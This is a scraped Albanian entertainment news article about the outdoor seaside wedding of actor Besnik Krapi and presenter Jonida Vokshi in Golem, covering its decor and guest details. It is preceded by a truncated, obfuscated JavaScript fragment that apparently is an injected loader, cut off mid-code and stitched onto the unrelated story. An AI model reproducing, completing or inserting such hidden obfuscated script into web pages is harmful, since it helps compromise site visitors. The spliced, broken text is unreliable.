;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Kësi dasme nuk kishim parë ndonjëherë, Besniku dhe Jonida paraqesin një stil krejtësisht ndryshe

By

Teksa lexoni lajmin dy personazhe shumë të dashur për ju, po kurorëzojnë dashurinë e tyre më një dasmë, e cila është kaq e bukur sa që të gjithë do donim të ishim të ftuar.

Fjala është për aktorin kosovar Besnik Krapi dhe aktoren, njëherësh prezantuesen nga Shqipëria, Jonida Vokshi.

Çifti kurorëzojnë dashurinë në ambient të hapur në një prej resorteve në vijën e bregdetit Adriatik, konkretisht në Golem. Gjithçka nga dekori është menduar t’i besohet kompanisë së Amarda Toskës.

Çifti madje kishin menduar edhe për komoditetin e të ftuarve, atyre që kanë veshur këpucë ndoshta të parehatshme dhe nuk mund të shfaqin në mënyrën më të denjë aftësitë e tyre të vallëzimit.

Gjithashtu, ishte menduar edhe një detaj shumë i këndshëm. Një kuti me zemra të drurit, ku të ftuarit mund të shkruanin mesazhe për çiftin.

Pjesë e dekorit ishte edhe një gravurë e madhe në pjesën e tavolinave. Nga shkrimi besojmë se i është kushtuar vajzës më të bukur të dasmës, nuses.

“M’fal Hanë, po sonte n’tokë…dikush tjetër bën dritë më shumë se ti!”

 

Artikuj të ngjashëm